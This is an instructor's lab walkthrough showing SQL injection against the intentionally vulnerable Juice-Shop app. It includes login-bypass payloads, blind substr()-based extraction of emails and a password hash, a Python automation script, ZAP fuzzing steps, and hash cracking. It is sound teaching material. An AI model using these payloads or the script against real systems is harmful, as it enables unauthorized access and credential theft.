Docker with Juiceshop - Focus on SQL Injection

In preparation for an ethical hacking class that I will be teaching, I wanted to work through a few of the Vulnhub or docker images to refresh my knowledge on the tools that can be used.  Also, to provide step-by-step walk-through exercises that students can follow.

Previous Posts that can assist with this Walkthrough
1. Billu_b0x - Highlights a Local File Inclusion vulnerability
2. Seattle - Highlights Brute Forcing a Login and XSS
3. Zico2 - Highlights directory traversal and PHP Command Injection
4. Docker with WolfCMS and MySQL Images
5. Exploitation of WolfCMS using Command Injection and usage of Web Shells

Tools Used:
VMware Workstation 12 Player
PuTTY or SSH client on host computer
Kali Linux Distro VM (Downloaded the VM edition from kali.org)

1 - docker
2 - docker image called bkimminich/juice-shop

Lab
1. Start the docker service on Kali that we previously installed.

Command: service docker start

2. Search docker hub for the bkimminich/juice-shop image and then pull it.

Command: docker search juice-shop
Command: docker pull bkimminich/juice-shop

* Remember that the image is provided as-is and should be trusted accordingly...

3. After you have pulled the image, go ahead and load it.

Command: docker run -it bkimminich/juice-shop
Keys: <Ctrl-p> <Ctrl-q> to detach, leaving the container running, and return to the console

4. Juice-Shop runs on port 3000.  From my host I am going to connect through SSH and use X11 Forwarding.

Command: ssh -X root@172.16.214.134

5. With X11 forwarding I will launch 3 different terminals: the first to execute "firefox", the second to execute "owasp-zap" and the third as a general command line.  The screenshot below shows the 3 terminals, with Firefox and OWASP ZAP open.


6.  With Juice-Shop loaded and the browser working through the proxy, we are going to look for a SQL injection vulnerability.  In the top-left corner of Juice-Shop click on Login.  You should be presented with the following screen.


7.  I am going to put in a valid-looking email and a test password and click Login.  You should see the error message "Invalid email or password".  Now let's check what the OWASP ZAP proxy recorded as the request.


8.  Notice in the above request that the information sent in the POST request is in JSON format: each parameter name is followed by a colon and the value sent.  Let's attempt some SQL injection on the username.  Type in the following for the username and the password.

Username: admin@admin.com' OR '1'='1'--;
Password: test



9. You should see that the page treats the username and password as a correct combination and allows the login.  We are changing the SQL statement and ending it with --;, which comments out the password check, while OR '1'='1' is always true, tricking the application into authenticating the user.

10.  Let's take the request in the proxy, open it in the Manual Request Editor (found under the Tools menu) and test some more SQL injection.  After it loads, delete the text and copy the request from the previous screenshot into the Manual Request Editor.

11.  Now that we can manually adjust the request, we can conduct SQL injection and receive an HTTP code of 200 if it worked or 401 if it did not.  I am going to try to execute a SQL function called test() to see what results come back through the proxy.  Since the function does not exist, I am expecting an error.

JSON: admin@admin.com' OR '1'=test('1')--;

12.  Below is the error that is received.  We can learn the structure of the query that we are tampering with, how we can take advantage of it and the database that is running.



13. From the error we can see that the query being executed is as shown below.

SQL: SELECT * FROM Users WHERE email = '<userinput>' AND password = '<hashed input>'

14. Now we are going to use SQL injection to identify the emails in the database that we can use to log in.  If we receive an HTTP response code of 200, an email address is returned; with any other code it is not.

JSON inject: admin@admi.com' OR 'a'=substr(email,1,1)--;

Reflecting back on the SQL statement in step 13, we are saying: SELECT everything FROM the Users table WHERE the email is admin@admi.com (which does not exist) OR 'a' is equal to the first character of the email.
Click "Send" on the Manual Request Editor.



15. The response comes back with an "HTTP/1.1 200" code, which means it successfully authenticated, and it displays the email address "admin@juice-sh.op".


16.  Let's try to find an email that starts with another letter of the alphabet.

JSON inject: admin@admi.com' OR 'b'=substr(email,1,1)--;



17. The response came back with the email address "bender@juice-sh.op".  What if multiple emails start with the letter "b"?  You could match 2 characters against the first 2 letters of the email.

JSON inject: admin@admi.com' OR 'be'=substr(email,1,2)--;

To gather all of the emails in the database you could cycle through all of the letters of the alphabet.  I would build a Python script to conduct this activity; however, my next step is to gather the password for the admin@juice-sh.op email account.
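A sketch of such a script, built around the same substr() prefix technique: it extends a confirmed prefix one character at a time until no candidate matches.  The /rest/user/login endpoint, the JSON field names, and the helper names are assumptions based on this lab's setup.

```python
import json
import string
import urllib.error
import urllib.request

CHARSET = string.ascii_lowercase + string.digits + "@.-"  # characters to try

def inject(prefix, length):
    """Build the blind-injection login body used in the steps above."""
    return {"email": f"admin@admi.com' OR '{prefix}'=substr(email,1,{length})--;",
            "password": "x"}

def probe(base_url, payload):
    """Return True on HTTP 200 (guess confirmed), False on 401."""
    req = urllib.request.Request(
        base_url + "/rest/user/login",  # assumed Juice-Shop login endpoint
        data=json.dumps(payload).encode(),
        headers={"Content-Type": "application/json"})
    try:
        urllib.request.urlopen(req)
        return True
    except urllib.error.HTTPError:
        return False

def extract_email(base_url, first_letter):
    """Recover one email starting with `first_letter`, character by character."""
    known = first_letter
    while True:
        for c in CHARSET:
            if probe(base_url, inject(known + c, len(known) + 1)):
                known += c
                break
        else:
            return known  # no character extends the prefix; value is complete
```

Swapping substr(email,...) for substr(password,...) turns the same loop into the password-guessing process shown in the following steps.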

18.  Let's modify the injection to begin guessing the password based on whether we receive an HTTP/1.1 200 response code.

JSON inject: admin@juice-sh.op' AND 'a'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'b'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'c'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND 'd'=substr(password,1,1)--;
HTTP/1.1 401 Unauthorized
...
JSON inject: admin@juice-sh.op' AND '0'=substr(password,1,1)--;
-- Passing the number zero.
HTTP/1.1 200 OK

19. So we now know that the password begins with the number zero, '0'.  Let's move on and figure out the next character.  At this point we do not know whether the stored value is a hash, encrypted, or plain text.


JSON inject: admin@juice-sh.op' AND '00'=substr(password,1,2)--;
-- Passing the number zero two times.
HTTP/1.1 401 Unauthorized

JSON inject: admin@juice-sh.op' AND '01'=substr(password,1,2)--;
-- Passing the number zero and a one.
HTTP/1.1 200 OK

20. Now we know that the password starts with a zero and a one, or '01', and we can move on to the next character.  This is a very long process to do manually, so let's use the OWASP ZAP fuzzing feature to speed it up.

21. First, let's use a program on Kali called crunch to generate a wordlist of guesses that start with '01'.

Command: crunch 3 3 -t 01% - Generates a wordlist with numbers 0-9
Command: crunch 3 3 -t 01@ - Generates a wordlist with letters a-z

You can view the man page of crunch by executing "man crunch".  The -t option starts each word with '01' and then appends a number for '%', a lower-case letter for '@', or an upper-case letter for ','.  Add "-o 3char-list.txt" to save the output to the wordlist file used with the fuzzer below.




23. Go back to the Manual Request Editor and modify the JSON inject to look at the first 3 characters of the password.

JSON inject: admin@juice-sh.op' AND '010'=substr(password,1,3)--;
-- Passing the number zero, one and then zero.
HTTP/1.1 401 Unauthorized

24. Go back to the main window in ZAP and scroll down in the history until you find the last entry you sent in step 23.  Then highlight the 010, right-click and click on Fuzz.


25. We are now going to set the payload to use the 3char-list.txt file and click "Start Fuzzer".  After the fuzzer is complete, click on the Code column heading under the Fuzzer tab, scroll to the top, and click on the first entry.  You should see the code is 200, which means the injected query was successful.  This shows us that the 3rd character of the password is the number 9.


26.  Keep working with the above process to figure out the password for the admin@juice-sh.op account.

Challenge: Write a script to do the exact same process but in a more automated way.

Challenge: What is the password for the admin@juice-sh.op account?

Challenge: What is the password for the other accounts in the database?

27.  After doing the above process for a while you will be able to extract the full hash of the password used by the admin@juice-sh.op account.  This is one reason that in a pentest you do not want to reset the admin account's password: it may cause interruptions.

Below is a screenshot of the small bash script I wrote to assist in this...


28.  Be careful what you use to crack a password hash.  On a private engagement the client will probably want you to use a private hash cracker, since submitting a hash to a public site discloses it.  For this exercise I used crackstation.net.


